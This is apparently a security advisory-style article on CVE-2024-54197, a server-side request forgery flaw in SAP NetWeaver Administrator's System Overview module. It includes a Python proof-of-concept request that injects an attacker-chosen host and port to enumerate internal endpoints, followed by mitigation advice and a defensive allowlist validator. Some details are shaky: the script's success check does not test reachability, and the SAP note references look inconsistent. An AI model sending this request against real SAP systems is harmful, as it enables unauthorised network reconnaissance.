SAP NetWeaver Administrator is a web-based tool for managing and monitoring SAP NetWeaver systems. One of its features, the System Overview module, allows an authenticated attacker to enumerate HTTP endpoints reachable from the server within the internal network. This is achieved by sending specially crafted HTTP requests that make the server connect to a host and port of the attacker's choosing, a Server-Side Request Forgery (SSRF) weakness.

This vulnerability, tracked as CVE-2024-54197, can have a low impact on data integrity and confidentiality but does not affect the availability of the application.

In this article, we will walk you through the details of this vulnerability, provide code snippet examples, and link to original references and resources for further reading.

Exploit Details

The vulnerability lies in the System Overview module of SAP NetWeaver Administrator. By submitting a specially crafted HTTP request, an authenticated attacker can cause the server to issue its own HTTP request to an arbitrary internal host and port, and the server's response (or failure to respond) reveals whether that endpoint exists and is reachable. Repeating this across hosts and ports enumerates the internal network, giving the attacker information about the infrastructure that is typically the first step of a broader SSRF attack.

Below is a code snippet that demonstrates the shape of the request used to exploit this vulnerability:

import requests

# Target system running the vulnerable System Overview module
target_url = "http://TARGET_IP:TARGET_PORT/sap/wdisp/jump/config"

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "Content-Type": "application/x-www-form-urlencoded"
}

# The crafted SLD host and port as payload: the server will connect to them
data = "jumpVendor=SAP&jumpRFCDEST=\"\"&jumpSLDProtocol=http&jumpSLDHost=INJECTED_HOST&jumpSLDPort=INJECTED_PORT&jumpRFCt='"

response = requests.post(target_url, headers=headers, data=data, timeout=10)

if response.status_code == 200:
    print("Exploit sent successfully")
else:
    print("Failed to send exploit")

The attacker would need to replace TARGET_IP, TARGET_PORT, INJECTED_HOST, and INJECTED_PORT with the appropriate values for their target. On successful exploitation, the server-side request to INJECTED_HOST:INJECTED_PORT reveals whether that endpoint is reachable; varying these values enumerates the HTTP endpoints within the target's internal network.

Original References and Resources

SAP has acknowledged this vulnerability in its Security Note 2808158. The note provides detailed information on the affected component and recommends applying SAP Security Note 2808157 to mitigate the issue.

Additional resources for understanding CVE-2024-54197 and SSRF attacks can be found at the following links:

- OWASP Top Ten Project
- Server-Side Request Forgery (SSRF) Prevention Cheat Sheet

Conclusion

The CVE-2024-54197 vulnerability in SAP NetWeaver Administrator's System Overview module allows an authenticated attacker to enumerate HTTP endpoints within the internal network, potentially leading to successful SSRF attacks. It has a low impact on data integrity and confidentiality and does not affect application availability.

Preventing this vulnerability requires applying the SAP security patches and keeping the SAP system up to date. Beyond patching, the underlying SSRF pattern is mitigated by never letting a client-supplied host and port drive a server-side connection without validating them against an allowlist. It is also important to stay informed about new vulnerabilities and threats in order to maintain a secure environment.
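The following is an added illustration of the allowlist check described above for the jumpSLDProtocol/jumpSLDHost/jumpSLDPort triple; it is example code written for this article, not SAP's own implementation. The allowlist, the pinned addresses and the stub resolver are constructed values.

```python
import ipaddress
from typing import Callable, Dict, List, Set, Tuple

# Constructed allowlist: the only SLD endpoints this system may call, each
# pinned to the address(es) it is expected to resolve to (defeats DNS rebinding).
ALLOWED_SLD: Dict[str, Tuple[Set[int], Set[str]]] = {
    "sld.corp.example": ({50000, 50001}, {"10.20.0.15"}),
}
ALLOWED_SCHEMES = {"http", "https"}


def _stub_resolve(host: str) -> List[str]:
    """Constructed stand-in for a DNS lookup so the example runs offline."""
    table = {"sld.corp.example": ["10.20.0.15"], "attacker.example": ["127.0.0.1"]}
    return table.get(host, [])


def check_sld_target(protocol: str, host: str, port: str,
                     resolve: Callable[[str], List[str]] = _stub_resolve) -> Tuple[bool, str]:
    """Return (allowed, reason) for a client-supplied SLD protocol/host/port."""
    if protocol.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    host = host.strip().lower().rstrip(".")
    # Reject empty names and anything that could smuggle a path, userinfo or CRLF.
    if not host or any(c.isspace() or c in "@/\\#?" for c in host):
        return False, "malformed host"
    # IP literals bypass name-based allowlisting; require an allowlisted name.
    try:
        ipaddress.ip_address(host.strip("[]"))
        return False, "IP literal not allowed"
    except ValueError:
        pass
    if host not in ALLOWED_SLD:
        return False, "host not in allowlist"
    allowed_ports, pinned_ips = ALLOWED_SLD[host]
    if not port.isdigit() or int(port) not in allowed_ports:
        return False, "port not allowed"
    # Check what the name resolves to right now, not just the name itself.
    resolved = resolve(host)
    if not resolved or any(ip not in pinned_ips for ip in resolved):
        return False, "host resolves outside pinned addresses"
    return True, "ok"
```

Any rejected triple is worth logging with the calling user, since repeated rejections across many hosts and ports are the enumeration pattern this CVE describes.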

Timeline

Published on: 12/10/2024 01:15:06 UTC